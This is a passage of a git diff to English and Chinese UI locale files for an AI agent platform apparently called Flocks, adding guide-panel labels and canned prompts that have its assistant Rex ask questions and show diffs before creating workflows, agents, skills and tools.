+        "guideApplyInstruction": "Do not require guide.md to contain a button table. After reading the full guide, treat \"Apply\" as an intent and extract publish-config source, apply/draft choices, validation rules, and missing information to collect. Applying publish/input/trigger templates must use GET/PUT {{configEndpoint}}; config.json may only be migrated through {{configSyncEndpoint}} as a fallback and must not be written directly to imply the change is active. If a change is needed, show a diff against the backend config first, then send one question card.",
+        "guideCollapse": "Collapse guide",
+        "guideExpand": "Expand guide",
+        "guideNote": "By default this only guides you. Any file change will show a diff first.",
+        "guidePrompt": "The user clicked the \"Guide Smart Setup\" button. This button means: perform a full configuration inventory and guided setup for this workflow. Read guide.md to discover what can be configured in this workflow, including but not limited to publish configuration, trigger/integration configuration, workflow execution configuration, input/output configuration, filtering/deduplication rules, sample validation, and runtime/template boundaries, then decide the single most useful next question to ask the user. The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The config template endpoint is GET/PUT {{configEndpoint}}, and the fallback migration endpoint is {{configSyncEndpoint}}.\n\nCurrent frontend API endpoints:\n{{apiEndpoints}}\n\nThe first step must be reading {{guidePath}}, and guide.md is the only source for this workflow's configuration methods, question order, defaults, and validation rules. You may call skill_load(name=\"{{configSkillName}}\") for the interaction protocol, but do not use the generic skill or skill references as a substitute for guide.md. If guide.md is missing or insufficient, stop and use the question tool to ask whether to generate guide.md from workflow.md/config.json. When I must choose, provide more information, confirm, or approve a diff, you must call the question tool and must not ask the question in ordinary text. Send one question card at a time, put the recommended default first, and include a custom/notes input where blank means none. Publish/input/trigger templates must read the backend config first, show a diff against that backend config, and after confirmation PUT the full config to {{configEndpoint}}; runtime actions must use the correct endpoint from Current frontend API endpoints. config.json and workflow.json triggers are migration fallbacks only and must not be written directly to imply the change is active. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, and do not ask the user what to do with workflow.json trigger templates.",
+        "guideQuestionPrompt": "The user clicked the \"{{focus}}\" button. This button means: {{instruction}} The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The config template endpoint is GET/PUT {{configEndpoint}}, and the fallback migration endpoint is {{configSyncEndpoint}}.\n\nCurrent frontend API endpoints:\n{{apiEndpoints}}\n\nThe first step must be reading {{guidePath}}. Do not require guide.md to contain a button table; treat \"{{focus}}\" as the user's intent, semantically extract the relevant configuration guidance, defaults, constraints, examples, validation rules, and missing information from the full guide, then use that extracted guidance to help the user. You may call skill_load(name=\"{{configSkillName}}\") for the interaction protocol, but do not use the generic skill or skill references as a substitute for guide.md. If guide.md is missing or insufficient, stop and use the question tool to ask whether to generate guide.md from workflow.md/config.json. When I must choose, provide more information, confirm, or approve a diff, you must call the question tool and must not ask the question in ordinary text. Send one question card at a time, put the recommended default first, and include a custom/notes input where blank means none. Publish/input/trigger templates must read the backend config first, show a diff against that backend config, and after confirmation PUT the full config to {{configEndpoint}}; runtime actions must use the correct endpoint from Current frontend API endpoints. config.json and workflow.json triggers are migration fallbacks only and must not be written directly to imply the change is active. If the backend endpoint is unavailable, stop the configuration flow, state that the backend config store cannot be read/written and nothing was applied, published, or started, and do not ask the user what to do with workflow.json trigger templates.",
+        "auditPrompt": "Please inspect the current workflow configuration and docs. The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The first step must be reading guide.md and using it as the configuration-detail source; if it is missing, say so clearly. Tell me what is already configured, what is missing, and the single most recommended next step. Do not modify files.",
+        "samplePrompt": "I want to validate this workflow with one realistic sample. The workflow ID is {{id}}, the workflow directory is {{dir}}, the workflow configuration guide is {{guidePath}}, the MD file is {{dir}}workflow.md, and the JSON file is {{dir}}workflow.json. The first step must be reading guide.md and using its sample-validation section as the source of validation rules. Tell me what sample format I should paste, and after I paste it, check field mapping, normalization output, and likely processing behavior. Do not modify files.",
         "canHelp": "I can help you:",
         "bullet1": "Modify node logic or execution code",
         "bullet2": "Adjust branch conditions and data flow",
         "bullet3": "Add or remove nodes",
         "bullet4": "Restructure the overall flow",
         "tipPart1": "Before making changes, check the current flow description in the left ",
-        "tipPart2": " tab. A clear overall description leads to better results.",
+        "tipPart2": " tab. Clear workflow.md intent leads to better results.",
         "retry": "Retry"
       }
     }
@@ -312,17 +455,56 @@
     },
     "rightPanel": {
       "tabOverview": "Details",
-      "tabChat": "Chat"
+      "tabChat": "Workbench",
+      "tabIntegration": "Publish"
     },
     "overview": {
-      "chatHint": "Describe your requirements in the \"Chat\" tab, workflow details will be filled automatically after generation",
+      "chatHint": "Describe your requirements in the \"Workbench\" tab, workflow details will be filled automatically after generation",
       "execDescription": "Execution Flow Description"
     },
+    "publish": {
+      "emptyTitle": "Waiting for workflow",
+      "emptyHint": "After the workflow is generated, configure API, Syslog, Kafka, Webhook, or scheduled publishing here."
+    },
     "chat": {
       "sessionTitle": "New Workflow",
       "preparing": "Preparing workflow assistant...",
       "inputPlaceholder": "Describe the workflow you want to create... (Enter to send)",
       "contextMessage": "The user wants to create a Flocks workflow, please use the workflow-builder skill to complete it.",
+      "emptyStateTitle": "No execution records yet",
+      "guidePanelTitle": "Rex Assisted Creation",
+      "guidePanelDesc": "Choose a guide or creation case. Rex will follow the workflow-builder skill to confirm scenario, inputs, outputs, node flow, and sample data before writing files.",
+      "generateEditDocPrompt": "This new task was triggered by the user clicking \"Generate Spec\". The button means: first use the workflow-builder skill to generate workflow.md, then let \"Generate Workflow\" create workflow.json from the confirmed workflow.md.\n\nPlease proceed as follows:\n1. Load and follow the workflow-builder skill first.\n2. You must use the question tool to ask whether I want a Chinese or English workflow spec; ask only one question at a time and allow custom input.\n3. If the left editor already has content, treat it as a draft. If it is empty, use the question tool to collect the business scenario, inputs, outputs, trigger mode, node flow, samples, and acceptance criteria needed to create the workflow.\n4. Use the workflow_zh.md / workflow_en.md template structure from the workflow-builder skill, but generate only one workflow.md file.\n5. Make workflow.md easy for humans to edit: explain purpose, scenarios, inputs, outputs, node flow, editable points, samples, and acceptance checks.\n6. Before writing workflow.md, show a diff and wait for my confirmation; after confirmation, write workflow.md under the new workflow directory.\n7. When finished, remind me that I can click \"Generate Workflow\" to generate workflow.json from workflow.md.\n\nCurrent left editor content:\n~~~markdown\n{{editDocContent}}\n~~~",
+      "generateWorkflowPrompt": "The user clicked the \"Generate Workflow\" button. This button means: generate the formal Flocks workflow from the current workflow.md in the left editor, with workflow.json as the core machine-executable artifact.\n\nPlease follow the workflow-builder skill:\n1. Load and follow the workflow-builder skill first.\n2. Treat the workflow.md content below as the primary source of intent; do not interpret this as a request to rewrite workflow.md.\n3. If no workflow directory exists yet, first confirm/generate a suitable workflow ID and directory from workflow.md, then write workflow.md and workflow.json. If a directory already exists, read the existing workflow.json and update the machine definition from workflow.md.\n4. The generated workflow.json must be valid JSON, and nodes plus edges must form a complete flow diagram.\n5. Before writing workflow.json, show a diff and wait for my confirmation.\n6. When finished, explain what changed in workflow.json and how I should test it.\n\nCurrent editor content of workflow.md:\n~~~markdown\n{{editDocContent}}\n~~~",
+      "guideSectionTitle": "Creation Guides",
+      "caseSectionTitle": "Creation Cases",
+      "guideActions": [
+        {
+          "label": "How to Create",
+          "description": "Start from business goal, inputs, outputs, node flow, sample data, and generation steps.",
+          "prompt": "Please follow the workflow-builder skill to guide me through creating a Flocks workflow from scratch. Do not write files yet. Use the question tool to ask one most important question at a time and help me clarify the business scenario, trigger mode, inputs, outputs, required tools/APIs, node steps, branch conditions, sample data, and acceptance criteria. After I confirm, you must generate and write workflow.md first, let me confirm it in the left editor or diff, then generate the complete workflow.json from the confirmed workflow.md and proceed to testing."
+        },
+        {
+          "label": "Requirement Brief",
+          "description": "Turn a fuzzy idea into a structured requirement suitable for workflow.md generation.",
+          "prompt": "Please help me clarify the workflow functional requirements so they can be used to generate workflow.md and workflow.json. Use the question tool to ask one question at a time and collect: what problem the workflow solves, input format, output format, user, automatic/manual trigger, required tools or services, exceptions and edge cases, and how success should be validated."
+        },
+        {
+          "label": "Design Node Flow",
+          "description": "Break the requirement into nodes, edges, branches, loops, and a sample-data checklist.",
+          "prompt": "Please use the workflow-builder skill to help me design the workflow node flow. First confirm the business goal plus inputs and outputs, then provide reasoning dimensions, node list, edge relationships, branch/loop logic, exception handling, and a Mermaid flow diagram. Do not write workflow.json until I confirm."
+        },
+        {
+          "label": "Edit Nodes",
+          "description": "For an existing draft or generated workflow, adjust node responsibility, IO, code, or connections.",
+          "prompt": "Please help me edit workflow nodes. First read the current workflow.md draft on the left and any existing workflow.json if available, then use the question tool to confirm which node I want to change, the goal, input/output changes, whether upstream/downstream edges are affected, and sample-data impact. Show a plan and diff before modifying files."
+        },
+        {
+          "label": "Prepare Sample",
+          "description": "Generate or validate one representative sample input for later node-by-node testing.",
+          "prompt": "Please follow the workflow-builder skill to help me prepare workflow sample input. First confirm the accepted data format and key fields. If I do not have a sample, construct a minimal valid JSON sample and use the question tool to ask me to confirm it. After confirmation, use it for later node tests and integration tests."
+        }
+      ],
       "welcomeMessage": "Hello! I'm your Workflow Creation Assistant 🚀\n\nPlease describe the workflow you'd like to create, for example:\n\n- **Threat Intelligence**: IP / Domain / File Hash lookups\n- **Data Processing**: Multi-source collection, cleaning, correlation\n- **Automated Response**: Security alert handling, incident response\n\nThe more detail you provide, the more accurate the generated workflow will be. You can also click the example questions below to get started quickly!",
       "exampleQuestions": [
         "Create an IP threat intelligence query workflow that takes an IP address, queries multiple intelligence sources, and generates a summary report",
@@ -330,6 +512,13 @@
         "Design a file hash detection workflow that cross-validates hash values across multiple threat intelligence platforms",
         "Build a phishing site detection workflow that analyzes URL features, page content, and SSL certificate information",
         "Create a security incident response workflow that automatically collects, correlates, and analyzes security alerts to generate remediation recommendations"
+      ],
+      "exampleQuestionLabels": [
+        "Create IP Intel Workflow",
+        "Create Domain Analysis Workflow",
+        "Create File Hash Workflow",
+        "Create Phishing Detection Workflow",
+        "Create Incident Response Workflow"
       ]
     }
   },
diff --git a/webui/src/locales/zh-CN/agent.json b/webui/src/locales/zh-CN/agent.json
index 121c8c96e..3d288a3e9 100644
--- a/webui/src/locales/zh-CN/agent.json
+++ b/webui/src/locales/zh-CN/agent.json
@@ -78,6 +78,133 @@
   "sheet": {
     "done": "完成"
   },
+  "create": {
+    "emptyStateTitle": "暂无创建对话",
+    "guidePanelTitle": "Rex 辅助创建",
+    "guidePanelDesc": "选择一个引导或案例，Rex 会先加载 agent-builder skill，确认名称、职责、能力边界和执行模式后再生成文件。",
+    "guideSectionTitle": "创建引导",
+    "caseSectionTitle": "创建案例",
+    "guideActions": [
+      {
+        "label": "如何创建子 Agent",
+        "description": "从名称、职责、边界、策略和工具白名单开始梳理。",
+        "prompt": "请按 .flocks/plugins/skills/agent-builder skill 引导我创建一个 Flocks 子 Agent。先不要写文件，先用 question 工具一次只问一个最关键问题，帮我明确 Agent 名称、职责描述、能力边界、执行策略、工具白名单、输出格式和不适用场景；我确认后再生成 ~/.flocks/plugins/agents/<name>/agent.yaml 和 prompt.md，并在写入前展示计划。"
+      },
+      {
+        "label": "梳理职责边界",
+        "description": "把模糊需求整理成可委派的 Agent 描述和触发条件。",
+        "prompt": "请帮我把子 Agent 的职责边界梳理清楚。目标是形成 agent-builder skill 可使用的创建说明。请一次只问一个问题，依次确认：它解决什么任务、何时由 Rex 委派、不能做什么、需要哪些工具、是否只读、输出格式和验收方式。"
+      },
+      {
+        "label": "选择执行策略",
+        "description": "在 read_only、react、plan_and_execute、explore 之间做选择。",
+        "prompt": "请根据 agent-builder skill 帮我选择子 Agent 的执行策略。请先确认任务风险、是否需要写文件、是否需要执行命令、是否需要探索代码库或联网查询，然后推荐 read_only、react、plan_and_execute 或 explore，并说明对应工具白名单。"
+      },
+      {
+        "label": "设计 Prompt",
+        "description": "生成可复用的 system prompt 结构、输出格式和约束。",
+        "prompt": "请帮我设计子 Agent 的 prompt.md。先确认角色、任务目标、能力清单、输出格式、约束和示例调用场景；在我确认前不要写文件。确认后按 agent-builder skill 的模板生成 prompt.md 草稿。"
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "威胁情报分析 Agent",
+        "description": "查询 IOC 信誉、关联上下文并输出研判报告。",
+        "prompt": "我想创建一个威胁情报分析子 Agent，用于分析 IP、域名、URL、哈希等 IOC，能调用项目里已有的情报工具并输出结构化研判报告。请按 agent-builder skill 引导我确认名称、工具白名单、只读边界、输出格式和适用场景。"
+      },
+      {
+        "label": "代码审计 Agent",
+        "description": "只读检查代码风险、回归风险和缺失测试。",
+        "prompt": "我想创建一个代码审计子 Agent，用于只读检查代码变更中的 bug、回归风险、安全风险和测试缺口。请按 agent-builder skill 引导我确认职责、read_only 策略、工具白名单和输出格式。"
+      },
+      {
+        "label": "日志分析 Agent",
+        "description": "分析安全日志，提取关键事件、异常模式和处置建议。",
+        "prompt": "我想创建一个日志分析子 Agent，用于读取安全日志、识别异常模式、汇总关键事件并给出处置建议。请按 agent-builder skill 引导我确认输入格式、工具权限、分析步骤和最终输出结构。"
+      }
+    ]
+  },
+  "edit": {
+    "emptyStateTitle": "暂无编辑对话",
+    "guidePanelTitle": "Rex 辅助修改",
+    "guidePanelDesc": "选择一个编辑入口，Rex 会基于当前 Agent 配置，引导你调整 Prompt、职责边界、工具权限和参数。",
+    "nativeGuidePanelDesc": "这是内置 Agent，只支持保存模型和温度；Rex 会围绕模型选择、温度策略和验证方式引导修改。",
+    "guideSectionTitle": "编辑引导",
+    "caseSectionTitle": "编辑案例",
+    "guideActions": [
+      {
+        "label": "优化当前 Agent",
+        "description": "先审视当前配置，再确认要解决的问题和修改边界。",
+        "prompt": "请帮我编辑当前 Agent「{{name}}」。请先基于当前配置做一个简短诊断，不要直接改文件；再用 question 工具一次只问一个最关键问题，帮我确认要优化的职责、Prompt、工具权限、输出格式和验收方式。确认后输出可提取到表单的 JSON 配置摘要。"
+      },
+      {
+        "label": "调整职责边界",
+        "description": "明确它应该做什么、何时被委派、哪些事情不该做。",
+        "prompt": "请帮我重新梳理当前 Agent「{{name}}」的职责边界。请对照现有描述和 System Prompt，先指出可能过宽、过窄或不清晰的地方，再逐步确认：适用场景、触发条件、不可做事项、必要工具和输出结构。"
+      },
+      {
+        "label": "收敛工具权限",
+        "description": "检查 Tools / Skills 是否过多，按最小权限重新选择。",
+        "prompt": "请帮我检查当前 Agent「{{name}}」的 Tools 和 Skills 配置。目标是最小权限：先说明每个能力是否与职责相关，再建议保留、移除或新增哪些工具/Skill，并给出理由。确认前不要输出最终配置。"
+      },
+      {
+        "label": "改写 Prompt",
+        "description": "优化角色、约束、步骤、输出格式和失败处理。",
+        "prompt": "请帮我改写当前 Agent「{{name}}」的 System Prompt。请先指出现有 Prompt 中角色、任务步骤、边界、输出格式、错误处理和示例调用是否清晰，再给出修改方案；我确认后再输出完整 Prompt 和 JSON 配置摘要。"
+      },
+      {
+        "label": "验证效果",
+        "description": "设计测试输入、预期输出和失败判据，指导保存后验证。",
+        "prompt": "请帮我验证当前 Agent「{{name}}」的配置效果。请先基于它的职责设计 2-3 个测试输入，分别说明预期输出、通过标准和失败判据；如果发现 Prompt 或工具权限可能影响测试结果，请给出需要调整的字段。确认后把建议整理成可提取到表单的配置修改。"
+      }
+    ],
+    "nativeGuideActions": [
+      {
+        "label": "检查模型策略",
+        "description": "判断当前模型是否适合这个内置 Agent 的任务特点。",
+        "prompt": "请帮我检查内置 Agent「{{name}}」的模型配置。注意：这是内置 Agent，只能保存模型和温度，不要建议修改 Prompt、Tools 或 Skills。请先说明当前任务对模型能力的要求，再给出是否建议切换模型，以及需要的 providerID 和 modelID。"
+      },
+      {
+        "label": "调整温度",
+        "description": "根据稳定性、创造性和安全性选择温度。",
+        "prompt": "请帮我调整内置 Agent「{{name}}」的温度。注意：这是内置 Agent，只能保存模型和温度。请先根据它的职责说明温度高低的影响，再给出一个推荐 temperature 数值和理由，并整理成可提取的 JSON。"
+      },
+      {
+        "label": "验证效果",
+        "description": "设计测试输入、预期输出和失败判据，指导保存后验证。",
+        "prompt": "请帮我验证内置 Agent「{{name}}」的模型和温度效果。请设计 2-3 个测试输入，说明预期输出、通过标准和失败判据；如果发现问题，只建议调整模型或温度，并整理成可提取的 JSON。"
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "变得更保守",
+        "description": "降低幻觉和越权风险，适合安全分析、审计等场景。",
+        "prompt": "我想让当前 Agent「{{name}}」更保守可靠。请帮我调整 Prompt、温度建议和权限边界，让它在信息不足时先追问或说明不确定性，不要猜测；同时保持输出清晰可验证。"
+      },
+      {
+        "label": "更适合委派",
+        "description": "让主 Agent 更容易判断何时调用它、如何消费结果。",
+        "prompt": "我想让当前 Agent「{{name}}」更适合作为子 Agent 被主 Agent 委派。请优化英文描述、职责触发条件、输入要求和输出格式，并检查工具白名单是否匹配。"
+      },
+      {
+        "label": "补充输出格式",
+        "description": "把结果格式固定下来，便于主 Agent 或工作流继续处理。",
+        "prompt": "请帮我为当前 Agent「{{name}}」补充稳定的输出格式。请先确认主要使用场景，然后设计字段、层级、简短示例和异常情况下的返回方式；我确认后再整理成 Prompt 修改。"
+      }
+    ],
+    "nativeCaseActions": [
+      {
+        "label": "变得更保守",
+        "description": "降低随机性，让安全分析、审计类任务更稳定。",
+        "prompt": "我想让内置 Agent「{{name}}」更保守可靠。请只围绕模型和温度给出建议，不要修改 Prompt、Tools 或 Skills；重点说明推荐 temperature、适用模型能力和保存后的验证方法。"
+      },
+      {
+        "label": "提升响应效率",
+        "description": "在不改内置配置的前提下选择更合适的模型和温度。",
+        "prompt": "我想让内置 Agent「{{name}}」响应更快、更稳定。请只评估模型和温度配置，说明是否建议切换到更轻量的模型、温度如何设置，以及如何用测试输入验证效果。"
+      }
+    ]
+  },
   "chat": {
     "createTitle": "创建子 Agent",
     "subtitle": "通过对话描述需求，AI 自动生成配置",
diff --git a/webui/src/locales/zh-CN/common.json b/webui/src/locales/zh-CN/common.json
index ce5f6374f..7f7b5913a 100644
--- a/webui/src/locales/zh-CN/common.json
+++ b/webui/src/locales/zh-CN/common.json
@@ -113,7 +113,7 @@
     "defaultCreate": "创建",
     "defaultSave": "保存",
     "tabDetails": "详情",
-    "tabAIEdit": "AI 编辑",
+    "tabAIEdit": "工作台",
     "tabTest": "测试",
     "rexThinking": "Agent 正在思考中...",
     "editAndSend": "编辑下方内容，发送给 Agent 查看效果",
@@ -127,7 +127,10 @@
     "cancelButton": "取消",
     "extracting": "提取中...",
     "extractFromRex": "从 Rex 提取配置",
+    "extractFromRexGuideDesc": "将 Rex 输出的配置摘要提取到表单。",
     "switchToForm": "切换到表单",
+    "guideCollapse": "收起创建引导",
+    "guideExpand": "展开创建引导",
     "testStartFailed": "测试启动失败",
     "extractFailed": "提取失败，请重试",
     "rexAssist": "Rex 协助",
@@ -145,6 +148,7 @@
     "yes": "✓ 是",
     "no": "✗ 否",
     "needsAnswer": "需要你的回答",
+    "customAnswer": "自定义 / 补充说明",
     "confirm": "确认",
     "skip": "跳过"
   },
diff --git a/webui/src/locales/zh-CN/nav.json b/webui/src/locales/zh-CN/nav.json
index da698432b..d5759ed70 100644
--- a/webui/src/locales/zh-CN/nav.json
+++ b/webui/src/locales/zh-CN/nav.json
@@ -23,6 +23,8 @@
   "expandNav": "展开导航",
   "collapseNav": "收起导航",
   "switchLanguage": "切换语言",
+  "switchToDarkTheme": "切换到深色模式",
+  "switchToLightTheme": "切换到浅色模式",
   "newVersion": "新版本",
   "hasNewVersion": "有新版本 {{version}}",
   "versionInfo": "Flocks 版本信息",
diff --git a/webui/src/locales/zh-CN/session.json b/webui/src/locales/zh-CN/session.json
index 0282fe9da..b3ca27038 100644
--- a/webui/src/locales/zh-CN/session.json
+++ b/webui/src/locales/zh-CN/session.json
@@ -85,6 +85,34 @@
     "stopTitle": "停止执行",
     "contextUsageTitle": "上下文已用：{{used}} / {{total}}（{{percent}}%）",
     "contextUsageUnknown": "上下文使用量未知",
+    "contextUsage": {
+      "title": "上下文使用量",
+      "close": "关闭",
+      "full": "{{percent}}% 已用",
+      "tokens": "~{{used}} / {{total}} Tokens",
+      "excludedTokens": "已排除 {{tokens}}",
+      "noAttributedSegments": "暂无可归因明细",
+      "breakdown": {
+        "systemPrompt": "系统提示词",
+        "toolDefinitions": "工具定义",
+        "tools": "工具调用",
+        "skillLoad": "技能加载",
+        "agentDelegation": "智能体委派",
+        "conversation": "会话内容",
+        "reasoning": "思考过程",
+        "draft": "当前草稿",
+        "compactedHistory": "已压缩历史"
+      }
+    },
+    "goal": {
+      "dismiss": "关闭目标提示",
+      "status": {
+        "active": "目标",
+        "completed": "已完成",
+        "blocked": "已阻塞",
+        "paused": "已暂停"
+      }
+    },
     "edit": "编辑",
     "editRawHint": "当前显示的是原始未渲染内容，保存后会直接更新这条消息文本。",
     "editRawTitle": "编辑原始内容",
@@ -96,6 +124,11 @@
     "regenerate": "重新生成",
     "thinking": "思考中...",
     "streaming": "继续输出中...",
+    "process": {
+      "title": "过程（{{count}} 项）",
+      "reasoningCount": "{{count}} 段思考",
+      "toolCount": "{{count}} 次工具调用"
+    },
     "you": "你",
     "sending": "发送中...",
     "contextCompressed": "上下文已压缩",
@@ -160,10 +193,24 @@
       "inputParams": "输入参数",
       "outputResult": "输出结果",
       "todoStages": "Todo 阶段",
+      "todoStatus": {
+        "pending": "待办",
+        "inProgress": "进行中",
+        "completed": "完成",
+        "cancelled": "已取消"
+      },
+      "todoSummary": {
+        "progress": "进度",
+        "inProgress": "进行中",
+        "completed": "完成",
+        "done": "完成"
+      },
       "errorLabel": "错误",
       "elapsed": "耗时",
       "workflowStage": "当前阶段：{{phase}}",
       "workflowNode": "节点：{{node}}",
+      "workflowLoopIteration": "循环",
+      "workflowLoopCurrent": "当前",
       "workflowStep": "步骤：{{step}}",
       "workflowPhase": {
         "queued": "排队中",
diff --git a/webui/src/locales/zh-CN/skill.json b/webui/src/locales/zh-CN/skill.json
index 3e9496135..681d6e9f6 100644
--- a/webui/src/locales/zh-CN/skill.json
+++ b/webui/src/locales/zh-CN/skill.json
@@ -78,6 +78,47 @@
     "missingDepsWarning": "技能已安装，但缺少以下依赖：{{missing}}",
     "runInstallDeps": "运行 \"安装依赖\" 以完成配置"
   },
+  "create": {
+    "emptyStateTitle": "暂无创建对话",
+    "guidePanelTitle": "Rex 辅助创建",
+    "guidePanelDesc": "选择一个引导或案例，Rex 会先加载 skill-builder skill，确认技能目标、触发场景、产物结构和验证方式后再生成文件。",
+    "guideSectionTitle": "创建引导",
+    "caseSectionTitle": "创建案例",
+    "guideActions": [
+      {
+        "label": "如何创建技能",
+        "description": "从用途、触发条件、说明结构、依赖和验证方式开始。",
+        "prompt": "请按 .flocks/plugins/skills/skill-builder skill 引导我创建一个 Flocks Skill。先不要写文件，先用 question 工具一次只问一个最关键问题，帮我明确技能名称、用途描述、何时触发、需要哪些 references/scripts、是否需要依赖、输出目录和验证方式；我确认后再生成 ~/.flocks/plugins/skills/<skill-name>/SKILL.md 及必要文件。"
+      },
+      {
+        "label": "梳理技能说明",
+        "description": "把模糊能力整理成可被 Agent 正确使用的 SKILL.md。",
+        "prompt": "请帮我把技能说明梳理成适合 SKILL.md 的结构。请一次只问一个问题，确认：技能解决什么问题、触发关键词、适用和不适用场景、执行步骤、需要读取的参考资料、可复用脚本、质量检查和示例。"
+      },
+      {
+        "label": "补充依赖与验证",
+        "description": "规划 bin/env/install specs、冒烟测试和失败处理。",
+        "prompt": "请按 skill-builder skill 帮我设计这个 Skill 的依赖声明和验证方式。请先确认是否需要命令行工具、Python/Node 包、环境变量或外部服务，然后给出 install specs、检查命令、冒烟测试和失败时给用户的提示。"
+      }
+    ],
+    "caseActions": [
+      {
+        "label": "安全分析技能",
+        "description": "把威胁分析步骤、报告格式和限制条件沉淀成 Skill。",
+        "prompt": "我想创建一个安全分析 Skill，用于指导 Agent 分析告警或 IOC，输出结构化研判报告。请按 skill-builder skill 引导我确认触发条件、分析流程、报告字段、参考资料和验证方式。"
+      },
+      {
+        "label": "代码迁移技能",
+        "description": "沉淀跨文件迁移、测试和回滚注意事项。",
+        "prompt": "我想创建一个代码迁移 Skill，用于指导 Agent 做框架升级或跨文件迁移。请按 skill-builder skill 引导我确认适用场景、迁移步骤、风险检查、测试命令和输出格式。"
+      },
+      {
+        "label": "外部系统使用技能",
+        "description": "记录某个系统的使用流程、禁止事项和工具调用约束。",
+        "prompt": "我想创建一个外部系统使用 Skill，用于指导 Agent 操作某个业务系统。请按 skill-builder skill 引导我确认系统名称、登录/查询流程、可用工具、禁止绕过事项、敏感信息处理和验收方式。"
+      }
+    ]
+  },
   "sheet": {
     "entityType": "技能",
     "path": "路径",
diff --git a/webui/src/locales/zh-CN/tool.json b/webui/src/locales/zh-CN/tool.json
index 416ca5495..7e21b2d42 100644
--- a/webui/src/locales/zh-CN/tool.json
+++ b/webui/src/locales/zh-CN/tool.json
@@ -92,6 +92,132 @@
     "testDetail": "测试 / 详情"
   },
 
+  "create": {
+    "mcp": {
+      "emptyStateTitle": "暂无接入对话",
+      "guidePanelTitle": "Rex 辅助接入",
+      "guidePanelDesc": "选择一个引导或案例，Rex 会先确认服务类型、连接方式、凭证和启动命令，再帮你生成可测试的 MCP 配置。",
+      "guideSectionTitle": "接入引导",
+      "caseSectionTitle": "接入案例",
+      "guideActions": [
+        {
+          "label": "如何接入 MCP",
+          "description": "从服务名称、stdio/SSE、命令参数、认证方式和连通性测试开始。",
+          "prompt": "请引导我接入一个 MCP 服务。先不要写配置，先用 question 工具一次只问一个最关键问题，帮我确认服务名称、连接方式（stdio 或远程 HTTP/SSE）、启动命令或 URL、认证方式、凭证保存方式、需要暴露的工具和连通性测试步骤；我确认后再生成配置并测试。"
+        },
+        {
+          "label": "本地 stdio 服务",
+          "description": "适合 npx、uvx、python 等本地进程型 MCP Server。",
+          "prompt": "请帮我接入本地 stdio MCP 服务。请先确认服务名称、启动命令、每个命令参数、需要的环境变量或 secret、工作目录和测试方式；确认前不要写配置。"
+        },
+        {
+          "label": "远程 SSE/HTTP 服务",
+          "description": "适合已经部署的远程 MCP 服务，重点确认 URL、传输协议和认证。",
+          "prompt": "请帮我接入远程 MCP 服务。请先确认服务 URL、传输协议（自动/SSE/Streamable HTTP）、认证方式、请求头或 token、是否需要 secret 管理和健康检查方式；确认前不要写配置。"
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "GitHub MCP",
+          "description": "接入 GitHub 仓库、Issue、PR 等工具能力。",
+          "prompt": "我想接入 GitHub MCP 服务，用于仓库、Issue 和 PR 操作。请引导我确认服务名称、启动命令、GITHUB_TOKEN 的 secret 保存方式、权限范围和测试步骤。"
+        },
+        {
+          "label": "Filesystem MCP",
+          "description": "接入一个受限目录的文件读取或管理能力。",
+          "prompt": "我想接入 Filesystem MCP 服务，只允许访问指定目录。请引导我确认目录范围、读写权限、启动参数、安全限制和测试步骤。"
+        },
+        {
+          "label": "远程业务 MCP",
+          "description": "接入企业内部已经部署好的远程 MCP 服务。",
+          "prompt": "我想接入一个企业内部远程 MCP 服务。请引导我确认 URL、认证方式、凭证管理、网络可达性、工具列表检查和上线前验证步骤。"
+        }
+      ]
+    },
+    "api": {
+      "emptyStateTitle": "暂无接入对话",
+      "guidePanelTitle": "Rex 辅助接入",
+      "guidePanelDesc": "选择一个引导或案例，Rex 会加载 tool-builder skill，确认 API 文档、认证和输出格式后生成 YAML 工具。",
+      "guideSectionTitle": "接入引导",
+      "caseSectionTitle": "接入案例",
+      "guideActions": [
+        {
+          "label": "如何接入 API",
+          "description": "从 Base URL、认证、接口列表、输入输出和测试样例开始。",
+          "prompt": "请按 .flocks/plugins/skills/tool-builder skill 引导我接入一个外部 API 作为 Flocks 工具。先不要写文件，先用 question 工具一次只问一个最关键问题，确认 API 名称、Base URL、认证方式、核心接口、输入参数、输出字段、错误处理、secret 保存和冒烟测试；我确认后再生成 ~/.flocks/plugins/tools/api/ 下的 YAML 工具。"
+        },
+        {
+          "label": "整理 API 文档",
+          "description": "把文档、示例请求和响应转换为工具定义草稿。",
+          "prompt": "请帮我整理 API 文档并形成工具创建说明。请先询问文档链接或文档内容，然后提取接口路径、方法、认证、请求参数、响应字段、分页/限流、错误码和测试样例；在我确认前不要写文件。"
+        },
+        {
+          "label": "设计鉴权与 Secret",
+          "description": "确认 API Key、Bearer、Header、Query 等凭证保存方式。",
+          "prompt": "请帮我设计 API 工具的鉴权和 secret 管理。请先确认认证类型、密钥名称、是否支持 {secret:...}、是否需要默认环境变量、失败提示和测试方式；不要在代码或配置里硬编码真实凭证。"
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "威胁情报 API",
+          "description": "接入 IOC 查询、信誉评分或情报摘要接口。",
+          "prompt": "我想接入一个威胁情报 API，用于查询 IP、域名、URL 或哈希信誉。请按 tool-builder skill 引导我确认接口文档、认证方式、输入输出字段、错误处理和冒烟测试。"
+        },
+        {
+          "label": "告警平台 API",
+          "description": "接入告警查询、详情拉取或状态更新接口。",
+          "prompt": "我想接入一个告警平台 API，用于查询告警列表、拉取详情或更新处置状态。请按 tool-builder skill 引导我确认接口范围、分页、认证、输出结构和测试数据。"
+        },
+        {
+          "label": "资产查询 API",
+          "description": "接入资产、主机、漏洞或标签查询接口。",
+          "prompt": "我想接入一个资产查询 API，用于按 IP、主机名或标签查询资产信息。请按 tool-builder skill 引导我确认 API 文档、参数、响应字段、secret 管理和验证方式。"
+        }
+      ]
+    },
+    "local": {
+      "emptyStateTitle": "暂无创建对话",
+      "guidePanelTitle": "Rex 辅助创建",
